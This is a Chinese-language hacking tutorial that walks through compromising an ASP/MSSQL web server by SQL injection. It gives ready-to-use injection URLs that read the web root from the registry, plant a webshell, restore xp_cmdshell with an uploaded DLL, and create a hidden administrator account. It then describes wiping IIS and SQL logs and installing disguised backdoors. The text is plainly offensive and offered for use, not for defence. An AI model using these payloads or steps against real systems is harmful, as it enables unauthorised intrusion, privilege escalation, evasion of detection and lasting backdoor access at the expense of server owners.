目前网上很流行SQL INJECTION 漏洞,也就是我们通常所说的SQL注入漏洞,我们利用这类漏洞可以跨表、跨库查询数据库信息,以及通过论坛来上传文件从而得到主机WebShell(这些都是一些很通常的手法,黑防原来也介绍得比较详细)。
好,拿到Web绝对路径后。继续建表:
http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][char](255));
这样我们就成功地建了一个名为cyfd的表,并且添加了类型是char,长度为255的字段名gyfd。然后向表中加数据:
http://www.something.com/script.asp?id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Pa rameters\Virtual Roots’, ’/’, @result output insert into cyfd (gyfd) values(@result);--
从注册表中读出Web绝对路径,再把路径插入到刚建的表中。然后报出WebShell的绝对路径:
http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd
where gyfd > 1)
出错后,IE返回错误,我们得到Web绝对路径“d:\Inetpub\wwwroot”!经过努力的成功特别香甜!喝口茶!
然后删除刚才建的表,提交:
http://www.something.com/script.asp?id=2;drop table cyfd;--
OK,有了路径下面就好办多了。打开我写的获取WebShell的程序,输入漏洞URL:http://www.yfd.com/yfd.com?id=2
输入保存木马的绝对路径:d:\Inetpub\wwwroot。
木马我早就配置好了,代码精简了又精简,只有30行代码,这样才少向服务器提交数据。加快速度嘛!木马的主要功能,就是输入内容,把输入的内容保存为一个文件。呵呵,通过这样的木马,我们就可以实现上传一些功能强大的脚本木马了,如海洋木马。
一分钟不到。程序都已经运行完毕。输入相应的路径,娃哈哈(wtf:要饭的兄弟挺喜欢这个“饮品”?哈哈!),WebShell来了,最快的速度生成了一个海洋木马,如图4,图5:
我生活在幸福之中!——wtf常常说这句话,今天看来我也被感染了!下面我们还得来!
四.恢复xp_cmdshell,向系统权限进军!
下面的工作就是很简单,很轻松了。10分钟不到,就给你一个管理员账号,都说了xp_cmdshell已经被删除了。并且无法恢复,这多半是管理员把xplog70.dll文件给删除,要不改名了。没事,我们上传一个xplog70.dll就搞定一切了,通过WebShell。我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell’, ’e:\inetpub\wwwroot\xplog70.dll’
恢复,支持绝对路径的恢复哦。:)
OK。我们用IE来查看一下是不是已经恢复了。提交:
http://www.something.com/script.asp?id=2 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = ’X’ AND name = ’xp_cmdshell’)
嘿嘿。返回正常。已经恢复了,下面的还用我说吗?呵呵!加账号:
http://www.something.com/script.asp?id=2;exec master.dbo.xp_cmdshell ’net user chouyfd chouyfd1314yf /add’
提升自己为超级管理员
http://www.something.com/script.asp?id=2;exec master.dbo.xp_cmdshell ’net localgroup administrators chouyfd /add’
完毕。打开你的终端连接程序,连接吧!哈哈,终于给我连上了。到此我就成功的拿到了这台主机的系统管理员账号。如图7:
下面的工作就是清除日志和留下超级后门,闪人!
五.事后处理工作
终端连接上后,以最快的速度,清除IIS日志,和MSSQL日志。
同时,把xp_cmdshell也给他删除掉,不要让他发现了,也就不好办了。再把我上传的那个xplog70.dll移动到system32目录下,改个我都不知道什么意思的名字叫:msxlog32.dll(打死他也查不出来,哈哈!)再将猪蛋儿提供的超级内核后门程序安装起,再把存在漏洞的脚本文件给打上补丁。同时在他的那个脚本程序中,我修改了代码,提交特定的参数(POST提示方式),显示我的Web后门程序! 这样两个后门,很保险!怕什么呢?刚过年,真开心啊!